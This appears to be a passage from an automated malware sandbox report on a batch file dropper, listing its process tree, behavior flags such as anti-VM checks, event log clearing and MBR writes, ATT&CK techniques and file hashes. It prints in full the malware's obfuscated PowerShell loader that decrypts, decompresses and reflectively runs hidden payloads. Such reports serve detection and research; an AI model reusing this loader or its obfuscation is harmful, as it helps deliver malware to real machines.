wrote to memory of 1016 4860 dllhost.exe 13 PID 4860 wrote to memory of 392 4860 dllhost.exe 14 PID 4860 wrote to memory of 912 4860 dllhost.exe 15 PID 4860 wrote to memory of 1104 4860 dllhost.exe 17 PID 4860 wrote to memory of 1116 4860 dllhost.exe 18 PID 4860 wrote to memory of 1124 4860 dllhost.exe 19 PID 4860 wrote to memory of 1144 4860 dllhost.exe 20 PID 4860 wrote to memory of 1272 4860 dllhost.exe 21 PID 4860 wrote to memory of 1308 4860 dllhost.exe 22 PID 4860 wrote to memory of 1324 4860 dllhost.exe 23 PID 4860 wrote to memory of 1408 4860 dllhost.exe 24 PID 4860 wrote to memory of 1416 4860 dllhost.exe 25 PID 4860 wrote to memory of 1572 4860 dllhost.exe 26 PID 4860 wrote to memory of 1584 4860 dllhost.exe 27 PID 4860 wrote to memory of 1652 4860 dllhost.exe 28 PID 4860 wrote to memory of 1736 4860 dllhost.exe 29 PID 4860 wrote to memory of 1768 4860 dllhost.exe 30 PID 4860 wrote to memory of 1792 4860 dllhost.exe 31 PID 4860 wrote to memory of 1892 4860 dllhost.exe 32 PID 4860 wrote to memory of 1948 4860 dllhost.exe 33 PID 4860 wrote to memory of 1956 4860 dllhost.exe 34 PID 4860 wrote to memory of 1692 4860 dllhost.exe 35 PID 4860 wrote to memory of 1940 4860 dllhost.exe 36 PID 4860 wrote to memory of 2092 4860 dllhost.exe 37 PID 4860 wrote to memory of 2156 4860 dllhost.exe 38 PID 4860 wrote to memory of 2244 4860 dllhost.exe 40 PID 4860 wrote to memory of 2336 4860 dllhost.exe 41 PID 4860 wrote to memory of 2532 4860 dllhost.exe 42 PID 4860 wrote to memory of 2552 4860 dllhost.exe 43 PID 4860 wrote to memory of 2620 4860 dllhost.exe 44 PID 4860 wrote to memory of 2628 4860 dllhost.exe 45 PID 4860 wrote to memory of 2660 4860 dllhost.exe 46 PID 4860 wrote to memory of 2744 4860 dllhost.exe 47 PID 4860 wrote to memory of 2824 4860 dllhost.exe 48 PID 4860 wrote to memory of 2912 4860 dllhost.exe 49 PID 4860 wrote to memory of 2920 4860 dllhost.exe 50 PID 4860 wrote to memory of 2936 4860 dllhost.exe 51 PID 4860 wrote to memory of 2952 4860 dllhost.exe 52 PID 4860 wrote to memory of 2296 4860 dllhost.exe 53 PID 4860 wrote to memory of 3360 4860 dllhost.exe 55 PID 4860 wrote to memory of 3484 4860 dllhost.exe 56 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1016
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{17019c63-adf5-4f99-9773-c0ad0945ee2b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d0500dad-7f4e-484c-9c59-a44194b148b7}2⤵PID:3448
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1124 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2660
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2532
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2092
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2824
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2952
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3360
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3484 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:540
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:516
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"3⤵PID:2588
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:3448
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵PID:3452
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function bGHD($RkCl){ Invoke-Expression -Debug -WarningAction Inquire -Verbose '$FfCT=[gySgyygystgyegymgy.gySgyegycugyrgyigytgyygy.gyCrgyygypgytgyogyggyragyphgyygy.Agyegys]gy::gyCgyrgyegyagytgye(gy)gy;'.Replace('gy', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$FfCT.MAHoAHdAHe=AH[AHSAHyAHsAHtAHemAH.AHSAHeAHcAHuAHriAHtAHyAH.AHCAHrAHypAHtoAHgAHraAHpAHhyAH.CAHiAHpAHhAHeAHrAHMoAHdAHeAH]AH::AHCBAHC;'.Replace('AH', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FfCT.PFEaFEdFEdiFEnFEgFE=FE[FESFEysFEtFEeFEmFE.FESFEecFEuFErFEiFEtFEyFE.CFEryFEpFEtoFEgFEraFEphFEyFE.FEPFEaFEdFEdiFEnFEgFEMFEodFEe]FE::FEPFEKFECFESFE7;'.Replace('FE', ''); Invoke-Expression -Debug '$FfCT.Kideidyid=[idSidyidsidtideidm.idCidoidnidvideidrtid]id:id:idFidridomidBaidside6id4idStidriidnidgid("rid7idsidg9idSid+id3id6idhidDsidsidlid9idDidLidaBidJidbidPidvidHidG4idWtidpidEsidjid+Cidg4id7idsidIidwidtidhUid=id");'.Replace('id', ''); Invoke-Expression -InformationAction Ignore -Debug -Verbose '$FfCT.IkDVkD=kD[SkDykDskDtkDekDmkD.CkDokDnkDvkDekDrkDt]kD:kD:kDFkDrkDokDmBkDaskDekD64kDSkDtrkDinkDgkD("+kD9kDfkDeMkDfkD2kDMkDPkDwkDtgkDTkDrkD7kD7kDlkDMKkD9kDgkDQkD=kD=");'.Replace('kD', ''); $UBuD=$FfCT.CreateDecryptor(); $NTSS=$UBuD.TransformFinalBlock($RkCl, 0, $RkCl.Length); $UBuD.Dispose(); $FfCT.Dispose(); $NTSS;}function bxuq($RkCl){ Invoke-Expression -WarningAction Inquire -Debug '$HOEL=NIdeIdwId-OIdbIdjIdeIdcIdtId SIdyIdsIdtIdeIdmId.IIdOId.IdMIdeIdmIdorIdySIdtIdreIdaIdm(,$RkCl);'.Replace('Id', ''); Invoke-Expression -InformationAction Ignore '$KAKm=NIdeIdwId-OIdbIdjIdeIdcIdtId SIdyIdsIdtIdeIdmId.IIdOId.IdMIdeIdmIdorIdySIdtIdreIdaIdm;'.Replace('Id', ''); Invoke-Expression -InformationAction Ignore '$tAxt=NwEewEwwE-OwEbwEjwEewEcwEtwE SwEywEswEtwEewEmwE.IwEOwE.wECwEowEmwEprwEeswEswEiowEnwE.GwEZiwEpwESwEtwErwEewEamwE($HOEL, [wEIwEOwE.CwEowEmwEpwErwEewEsswEiwEowEnwE.wECwEomwEpwErwEewEswEswEiowEnMwEowEdewE]wE::wEDewEcwEowEmwEpwErwEeswEswE);'.Replace('wE', ''); $tAxt.CopyTo($KAKm); $tAxt.Dispose(); $HOEL.Dispose(); $KAKm.Dispose(); $KAKm.ToArray();}function LAnn($RkCl,$LRjf){ Invoke-Expression -Debug -WarningAction Inquire '$QPns=[DzSDzyDzstDzeDzmDz.DzRDzeDzflDzeDzcDztDziDzoDzn.DzADzsDzsDzeDzmDzblDzy]Dz:Dz:LDzoDzadDz([byte[]]$RkCl);'.Replace('Dz', ''); Invoke-Expression -Debug '$IQgG=$QPns.EUqnUqtUqryUqPUqoUqiUqnUqt;'.Replace('Uq', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$IQgG.SeISenSevoSekSeeSe(Se$SenSeulSelSe, $LRjf);'.Replace('Se', '');}$RtKw = 'C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat';$host.UI.RawUI.WindowTitle = $RtKw;$kLna=[System.IO.File]::ReadAllText($RtKw).Split([Environment]::NewLine);foreach ($jDdi in $kLna) { if ($jDdi.StartsWith('cKvGI')) { $haun=$jDdi.Substring(5); break; }}$dtxP=[string[]]$haun.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose -WarningAction Inquire '$PHM = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[0].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');Invoke-Expression -Verbose -Debug -WarningAction Inquire -InformationAction Ignore '$cOZ = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[1].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$MKb = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[2].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');LAnn $PHM $null;LAnn $cOZ $null;LAnn $MKb (,[string[]] (''));3⤵PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4888 -s 25604⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:1184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1748
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:636
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"5⤵PID:3616
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:856
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵PID:2944
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function bGHD($RkCl){ Invoke-Expression -Debug -WarningAction Inquire -Verbose '$FfCT=[gySgyygystgyegymgy.gySgyegycugyrgyigytgyygy.gyCrgyygypgytgyogyggyragyphgyygy.Agyegys]gy::gyCgyrgyegyagytgye(gy)gy;'.Replace('gy', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$FfCT.MAHoAHdAHe=AH[AHSAHyAHsAHtAHemAH.AHSAHeAHcAHuAHriAHtAHyAH.AHCAHrAHypAHtoAHgAHraAHpAHhyAH.CAHiAHpAHhAHeAHrAHMoAHdAHeAH]AH::AHCBAHC;'.Replace('AH', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FfCT.PFEaFEdFEdiFEnFEgFE=FE[FESFEysFEtFEeFEmFE.FESFEecFEuFErFEiFEtFEyFE.CFEryFEpFEtoFEgFEraFEphFEyFE.FEPFEaFEdFEdiFEnFEgFEMFEodFEe]FE::FEPFEKFECFESFE7;'.Replace('FE', ''); Invoke-Expression -Debug '$FfCT.Kideidyid=[idSidyidsidtideidm.idCidoidnidvideidrtid]id:id:idFidridomidBaidside6id4idStidriidnidgid("rid7idsidg9idSid+id3id6idhidDsidsidlid9idDidLidaBidJidbidPidvidHidG4idWtidpidEsidjid+Cidg4id7idsidIidwidtidhUid=id");'.Replace('id', ''); Invoke-Expression -InformationAction Ignore -Debug -Verbose '$FfCT.IkDVkD=kD[SkDykDskDtkDekDmkD.CkDokDnkDvkDekDrkDt]kD:kD:kDFkDrkDokDmBkDaskDekD64kDSkDtrkDinkDgkD("+kD9kDfkDeMkDfkD2kDMkDPkDwkDtgkDTkDrkD7kD7kDlkDMKkD9kDgkDQkD=kD=");'.Replace('kD', ''); $UBuD=$FfCT.CreateDecryptor(); $NTSS=$UBuD.TransformFinalBlock($RkCl, 0, $RkCl.Length); $UBuD.Dispose(); $FfCT.Dispose(); $NTSS;}function bxuq($RkCl){ Invoke-Expression -WarningAction Inquire -Debug '$HOEL=NIdeIdwId-OIdbIdjIdeIdcIdtId SIdyIdsIdtIdeIdmId.IIdOId.IdMIdeIdmIdorIdySIdtIdreIdaIdm(,$RkCl);'.Replace('Id', ''); Invoke-Expression -InformationAction Ignore '$KAKm=NIdeIdwId-OIdbIdjIdeIdcIdtId SIdyIdsIdtIdeIdmId.IIdOId.IdMIdeIdmIdorIdySIdtIdreIdaIdm;'.Replace('Id', ''); Invoke-Expression -InformationAction Ignore '$tAxt=NwEewEwwE-OwEbwEjwEewEcwEtwE SwEywEswEtwEewEmwE.IwEOwE.wECwEowEmwEprwEeswEswEiowEnwE.GwEZiwEpwESwEtwErwEewEamwE($HOEL, [wEIwEOwE.CwEowEmwEpwErwEewEsswEiwEowEnwE.wECwEomwEpwErwEewEswEswEiowEnMwEowEdewE]wE::wEDewEcwEowEmwEpwErwEeswEswE);'.Replace('wE', ''); $tAxt.CopyTo($KAKm); $tAxt.Dispose(); $HOEL.Dispose(); $KAKm.Dispose(); $KAKm.ToArray();}function LAnn($RkCl,$LRjf){ Invoke-Expression -Debug -WarningAction Inquire '$QPns=[DzSDzyDzstDzeDzmDz.DzRDzeDzflDzeDzcDztDziDzoDzn.DzADzsDzsDzeDzmDzblDzy]Dz:Dz:LDzoDzadDz([byte[]]$RkCl);'.Replace('Dz', ''); Invoke-Expression -Debug '$IQgG=$QPns.EUqnUqtUqryUqPUqoUqiUqnUqt;'.Replace('Uq', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$IQgG.SeISenSevoSekSeeSe(Se$SenSeulSelSe, $LRjf);'.Replace('Se', '');}$RtKw = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $RtKw;$kLna=[System.IO.File]::ReadAllText($RtKw).Split([Environment]::NewLine);foreach ($jDdi in $kLna) { if ($jDdi.StartsWith('cKvGI')) { $haun=$jDdi.Substring(5); break; }}$dtxP=[string[]]$haun.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose -WarningAction Inquire '$PHM = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[0].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');Invoke-Expression -Verbose -Debug -WarningAction Inquire -InformationAction Ignore '$cOZ = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[1].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$MKb = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[2].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');LAnn $PHM $null;LAnn $cOZ $null;LAnn $MKb (,[string[]] (''));5⤵PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3124 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3124 -s 25566⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3760
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3124 -s 26366⤵PID:220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:3936
-
-
-
-
-
-
C:\Windows\$nya-onimai2\sWGTMr.exe"C:\Windows\$nya-onimai2\sWGTMr.exe"2⤵
- Executes dropped EXE
PID:2972 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2112
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3644
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3828
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3984
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:3972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:316
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2328
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4256
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4588
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4896
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe a25b647590130b1da111df62fd9d21fa xdrveY16qU2nBafLYkOtaA.0.1.0.0.01⤵
- Sets service image path in registry
PID:4108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2016
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:1496
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:2756
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:3260
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4376
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:5048
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2332 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 4888 -ip 48882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3124
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 3124 -ip 31242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4292
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 3124 -ip 31242⤵PID:3716
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:2944
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38KB
MD5ae992396532d2233178d3dad879f62a0
SHA176471e4d7262cf08f1a0776a07e7afc902cabf8c
SHA256943225fd74a76632d30b1da3442e15256c33867ba254c89de3fa7cf7379dc96f
SHA512eb1c59a70154dd2f01b34b591c349d2c807d9c9bdae0b10d1592e22e240e1ca6865965a81e0028cbee6d0cc39535c4019c7aa304c091d2f5be5fc896e5beeaeb
-
Filesize
13KB
MD5f762aedf401c1ba24695ca9ec62b7d0b
SHA1524fd28ef3e99eb5ffe3a0fe206faeafd712d847
SHA256986ed2ec6a9deb5f8a24af7f97c5095061bf770def995bad41b70a7eb0a3e42d
SHA512a4ef4ffd087d1546c0b6054dc507ad1623a440af8efaa014e19c7f3f9fd143b2b645889d10215e8d43499756d86d814a0aa51b15fdf1a0c0f4664f692e5eaff8
-
Filesize
38KB
MD5608df0cc752ee3e9e9c37245a8d9aee4
SHA1c6bc57d4bd901c6dda83f75d647dcf6aa2c0c85f
SHA2566d47b6d2b3249b591e74202ea53e9752e99494c921543f57edad4ace69e32c11
SHA5120ac2b073b43c467cb826510583de4df430db89cfc4eb962e9a1c0cadba7f676319dabda31caf62ed9133e0c5a6599afb84937fbca60a2d458cb7fab46432911d
-
Filesize
13KB
MD572987f38b6998c22dd3244bf643d8b7f
SHA195f3f3b9c209f8dda1b5c08c1aa36ec4f13127ec
SHA256d2222102637fe1002b7ecd7d1be54d31609cb3be0f040c4d38c11d1a347054d9
SHA51227b1f66e80ee20cdc950ef55dd1e1f6d83255af2415082178d8deb1dd5abddc3556739a2e150f0145c1b8b01e57a080119a9f558068033d75f90e5735cd449dc
-
Filesize
3KB
MD5bb8306e1bcf2e988e16c1aee4383f269
SHA13f261ea9b6df59d223f7c61adddc7f6f515e6e4e
SHA256859eb6128cadf870e8235e87af15e13e6243b84690f641612be03c8dd83c4b98
SHA512ad95bd6d26de7cea5ddaa4c3d92ced71899be98bac8593fed13b815a25eccd71817300f0cde97d87d3722515691a4a82a7d2d06a832d6181f05ccd73649247d3
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
3KB
MD576a18ac328480a11da294618d5d31ffd
SHA10224f6c541f3e833a9bbe76184ec4b2b5487fe62
SHA256e0ed940dd5e72400cd69d53a59216af270adbfd107742485db35b4623ed710e6
SHA512f73d3ec83eff892ca425cc7cacf2e06f77b0edd24a8b5fa4e8ff02349a9653553884e3ee41c650bc17598392da08a8e230eadf129dcac4e0ea1e19d01ac84bbe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
